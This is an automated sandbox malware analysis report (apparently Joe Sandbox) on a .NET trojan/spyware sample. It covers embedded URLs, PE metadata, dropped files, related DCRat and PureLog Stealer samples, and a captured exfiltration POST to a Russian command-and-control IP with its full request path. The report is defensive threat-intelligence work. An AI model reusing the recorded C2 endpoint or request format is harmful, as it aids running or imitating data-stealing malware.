00000005.00000002.4192170068.000000001303F000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001367C000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000131E2000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013C02000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001394D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001312D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013AB7000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000135C8000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000137E4000.00000004.00000800.00020000.00000000.sdmp, cnSOlUGbDb.5.dr, zNtANojNQT.5.dr, dqHU3bZlOg.5.dr, no6tUFVlRQ.5.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	8vURQqkwa9.5.dr	false		high
https://support.mozilla.org/products/firefox	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4126682689.0000000003042000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17p	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4126682689.000000000565E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4235532439.000000001EA42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013296000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013730000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013899000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001334A000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013B4D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000133FE000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001303F000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001367C000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000131E2000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013C02000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001394D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001312D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013AB7000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000135C8000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000137E4000.00000004.00000800.00020000.00000000.sdmp, cnSOlUGbDb.5.dr, zNtANojNQT.5.dr, dqHU3bZlOg.5.dr, no6tUFVlRQ.5.dr	false		high
http://62.109.H	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4126682689.0000000005B5D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4235532439.000000001EA42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4235532439.000000001EA42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4235532439.000000001EA42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4235532439.000000001EA42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4235532439.000000001EA42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	8vURQqkwa9.5.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013D38000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013E0A000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000142D7000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001426A000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013F68000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013EDC000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000014224000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013F22000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013D7E000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000141DE000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000140C6000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000014152000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013FAE000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013FF4000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013E96000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013DC4000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013CF2000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013E50000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001410C000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001431D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000014291000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013296000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013730000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013899000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001334A000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013B4D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000133FE000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001303F000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001367C000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000131E2000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013C02000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001394D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.000000001312D000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.0000000013AB7000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000135C8000.00000004.00000800.00020000.00000000.sdmp, zDqAlrJjQSnFyiiCVBYxCXJUQP.exe, 00000005.00000002.4192170068.00000000137E4000.00000004.00000800.00020000.00000000.sdmp, cnSOlUGbDb.5.dr, zNtANojNQT.5.dr, dqHU3bZlOg.5.dr, no6tUFVlRQ.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.109.16.145	unknown	Russian Federation		29182	THEFIRST-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586421
Start date and time:	2025-01-09 04:11:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FYKrlfQrxb.exe renamed because original name is a hash value
Original Sample Name:	de020ea4df72a05a6d3850f89804167f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/310@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 23.56.254.164, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
22:12:07	API Interceptor	12456857x Sleep call for process: zDqAlrJjQSnFyiiCVBYxCXJUQP.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEFIRST-ASRU	http://globconnex.com	Get hash	malicious	Unknown	Browse	185.253.34.129
	aW6kSsgdvv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	62.109.6.177
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	188.120.241.50
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	188.120.241.50
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	82.146.48.146
	Y96iIjl6mj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	62.109.1.101
	DF2.exe	Get hash	malicious	Unknown	Browse	188.120.244.218
	setup.exe	Get hash	malicious	Unknown	Browse	37.230.117.113
	ArELGBzuuF.exe	Get hash	malicious	DCRat	Browse	185.43.5.145
	TodjHkXUZB.exe	Get hash	malicious	DCRat	Browse	62.109.25.165

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\MvQOkJAc.log	PlZA6b48MW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3XtEci4Mmo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	Z90Z9bYzPa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	0J5DzstGPi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	aW6kSsgdvv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	kJrNOFEGbQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\Users\user\Desktop\FYKrlfQrxb.exe
File Type:	ASCII text, with very long lines (711), with no line terminators
Category:	dropped
Size (bytes):	711
Entropy (8bit):	5.913404876773239
Encrypted:	false
SSDEEP:	12:G5D9otGlA+C0AwhtJJ9ECdrw8Kp9Juex/osHMCxRr0cxUUMvP3URXxcdcCplgYoL:G55i0Fhh1dEvp9JfFHxF0cSlklSMtJUG
MD5:	9E1F19D25AF7FE4743ABF09A9E9B5DE7
SHA1:	B86EA6D5DBF4ABC41979951215940095DEEF5F48
SHA-256:	931CC664021EE0B0C8578B97BA7F080F5611023C21AE876124C58198EF811D6E
SHA-512:	16F7F63E5AD508FEE3B2DC29F83AEF6D41F15A8DCB2E8B1BC8FB128E8A54449C483BF1AD5EFAA926BC60DB695F12C2131F9E6D5E985EFC2133C512D04ECC9DD7
Malicious:	false
Reputation:	low
Preview:	PcbJyUTWGzuneUrpm3KMKxr5ewVMycoP0vGx4dh7GMWmFedqpiENxphcufoB9HioKewtO4vJVMF8aF09SogPXbcLOoCYyf79osbksubux51kjjBpppsUkSQtCkek1WUzOFUsnPRhMwbck1lomXtJwmZVcriIP13bkBWeOTBZXLIy1xJK808enLClq9P5rJRV2A2ifHZSWTvlekdoiYJZ3ZyY8uxPEFsO3x504kp1apHTabGFfkXTA1bdMdkvUJOQlgsrpnt7tR9NRe8hnrudrZOBVcnbA3gQb1r3sZa10ajs2NMrfDHmZujMSqVNAS7zvtwaxFyOR3mRzgJIP556v31qSflCDN1icu7Ibw4aO3VfIRWvhN7EWAD12FIRdwKDCEyEjArdBfr1iViAI0ezPxLcrFQVnn6ctSdEcRMhfdC1SLSghHInRUxO2WXduVzYjPIQ2di1n7UwuUJfwtygeTKYeOLF4swKnoRDDCoDjR9UABeiM2qAhT3PEuvnSc65KKIFCGcuEv7NT0Xctm2CBvmUvC8SRBvHUEJ03ZgGZ66wWq6NXT4pj43YhxTAHJcD9z2PqgiUGwmFz08FGv57GGiZKuTGFg9Pd2wgxqh0ukiwSxjqyO4WOf63RcE5NcOkwWl6EcRZNENghvHWLmR1mnB862PVllnRV8A6MmmW7eIKSaVgVrukLW8JVnALN6xmb5KjvLK

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.609881103024484
Encrypted:	false
SSDEEP:	12:PTl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:jdUOAokItULVDv
MD5:	E11928D0C5EEDC09C996276A6EBEEAC1
SHA1:	50BE3CE3B504C31C85859A44BB74184530DA9221
SHA-256:	39F871844BA05FCA9B9860080BF29ABD4547B45C358EC17A4F46769CE902D4E8
SHA-512:	0D664648DF5DC71F13A23E51AC8124196302980133F950A0829FA5B7F5530271E91BC96A6FF301D624B35B6C061E2F3328D361B1ACFE68FD46404FDCD000E6C4
Malicious:	false
Preview:	..Pinging 210979 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.525948143512337
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	FYKrlfQrxb.exe
File size:	1'899'008 bytes
MD5:	de020ea4df72a05a6d3850f89804167f
SHA1:	33a5c198a384086b85dbfc8a9820d1758204667c
SHA256:	0ce80aeb4d7735cb992efa0666b150aeb8e5bec83e5ff2389fa643c28ffd87fa
SHA512:	719db18f98c4b9cac1c09954fae46def924f1e9425f863cc515c453d174c0701fbf56a7fe60a4146e7a78e3906cfbb86dd8d84e4085fb2cd2654109e1980940f
SSDEEP:	24576:hK6gLfmF6uHqFnf/0Pka1Lt8QYc/qqYaXE3KnMwtE6tTs+O+TNi+LCyiqdUG09a:hK3OsWm/I0c/WKn7E8Tse/LCVz1
TLSH:	DD95BF0696628E73C7A47F3185D7502E82B2C7727962EF1B7A1F14D1AD062309F4B6B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e............................n.... ... ....@.. .......................`............@................................

Entrypoint:	0x5d106e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d1020	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d2000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1cf074	0x1cf200	7cae2a2e22bb3ef8c9b50739da77d84f	False	0.7765429951079622	DIY-Thermocam raw data (Lepton 2.x), scale 3584-1, spot sensor temperature 0.000000, unit celsius, color scheme 4, calibration: offset 0.000000, slope 10.629883	7.5293595147541605	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1d2000	0x370	0x400	7bc034f98651072d22860ddfbc431da4	False	0.376953125	data	2.86382809101071	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1d4000	0xc	0x200	65b57b6014f0731b9def420e583b0cc3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:07.335515022 CET	428	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:07.685297012 CET	344	OUT	Data Raw: 00 0b 04 05 06 0c 01 00 05 06 02 01 02 07 01 0b 00 0a 05 0c 02 05 03 09 07 06 0e 04 06 0e 01 02 0a 06 06 5b 03 54 04 50 0e 50 04 00 04 01 07 00 07 04 0e 0a 0f 54 07 01 04 05 04 06 06 01 07 0e 03 00 0f 0c 04 04 01 03 0e 55 0f 04 0d 53 0c 01 04 0c Data Ascii: [TPPTUSU\L}Q~s~M`LnYv\wTfY`otZpxRH{NThTtAwtt}e~V@Az}\}bu
Jan 9, 2025 04:12:08.046184063 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:08.143620968 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:07 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1412 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7e 4e 78 53 56 59 79 72 64 04 6b 5f 6b 44 69 59 7b 0a 7f 06 7d 41 6e 60 6b 59 69 4c 5e 02 60 5d 65 40 79 72 7a 5a 75 66 52 01 7e 5b 78 01 55 4b 72 55 77 62 6b 02 7d 61 7e 5f 6b 49 57 51 79 76 5e 0d 69 5a 7f 05 61 5b 69 4e 77 07 6d 47 7c 62 66 02 69 55 70 43 7f 74 67 06 75 5c 7b 06 7c 5b 7d 49 7d 06 7d 01 78 49 52 4c 6c 67 70 4c 7b 6e 7b 02 78 61 7c 46 78 05 66 06 6b 06 6c 44 79 77 74 4b 7c 71 6c 5e 61 4f 78 48 7a 51 41 5b 68 74 63 52 7d 61 65 0a 75 7f 74 02 7b 7c 63 5d 74 73 6e 0b 7b 71 71 47 69 7c 61 5f 78 71 62 49 76 05 6f 02 75 71 78 41 74 5f 7a 50 7e 5d 7a 06 74 71 7d 05 76 65 6b 50 7e 7c 66 5e 60 6f 70 04 7f 70 7c 06 6f 6f 73 03 7b 59 76 44 7c 6e 7f 51 77 5e 7f 5f 69 61 7d 50 69 54 60 52 7b 43 7e 4e 69 5c 65 07 7b 5d 46 51 68 7c 55 53 7e 70 74 08 7d 77 7e 01 6f 6e 74 58 79 72 52 46 68 5f 7f 01 69 59 6f 08 68 5e 58 50 7b 73 7b 5c 7e 72 74 00 77 63 71 51 7b 5c 79 01 75 76 7c 02 7d 48 60 02 7e 66 79 4f 77 62 59 03 7f 4c 61 4d 7f 59 7a 43 7b 48 6c 4f 7e 73 51 4a 76 4c 71 06 77 71 75 05 7c 4f [TRUNCATED] Data Ascii: VJ~NxSVYyrdk_kDiY{}An`kYiL^`]e@yrzZufR~[xUKrUwbk}a~_kIWQyv^iZa[iNwmG\|bfiUpCtgu\{\|[}I}}xIRLlgpL{n{xa\|FxfklDywtK\|ql^aOxHzQA[htcR}aeut{\|c]tsn{qqGi\|a_xqbIvouqxAt_zP~]ztq}vekP~\|f^`opp\|oos{YvD\|nQw^_ia}PiT`R{C~Ni\e{]FQh\|US~pt}w~ontXyrRFh_iYoh^XP{s{\~rtwcqQ{\yuv\|}H`~fyOwbYLaMYzC{HlO~sQJvLqwqu\|OT~BV}gKvaUI{LSH}^_{Y^xIR{}kIy\d{sPN\|^tKxIlI~boOv_^H\|\|s\|w\|OO}Nv\|tzl`tpzz_SI}Bz{qfvssDvaROtO~ANrOwrmwe\|latR\|cZJy\|Qx`j\|SxCwg\|}rPO}Cw{mfN}\[\|pdlRp\|B~Y\z}Qxrxq{}go@\|`}OzMZB~L`w][yOywfp~fdN}vmAw\}bu\|YTCxfp~]wGuL[vaqG\|OPF}\|`~Y{Ju_{zbmG}N_D{wlxYZ{CwyrdK{]T{]NZyw^K~LgOv_dI~lgKIgT\|bqwl\|oRZIwsfnb~\iof_z\y\}b`g{ZL~JxYz`\~YuvlB\|Rat\|ZLh`sXxBR^o`TKClNw^`iarzSYQ`q}@T[\\hl{iSp{@jlwikyfq`U~gFkrtiexTRZjTW\s]ScB[~PVsb_Zjsgie@RrPZXYZ~uzYkg}Qo_`B~cgaauwXv]kavK}R`@iIkKvasl\i~MqSJsZldBTqd_VaWVZaNVcoIRp\|z\QBvqlE~lH~Yt}f}JqU]ZWsB]cSIVYZR`a\|_\XlZ`qsY@ZXDP}wyYcaBZyoVPoSZUo[P`FRY[aYe{UOZ^J_\|u}VinOWqa
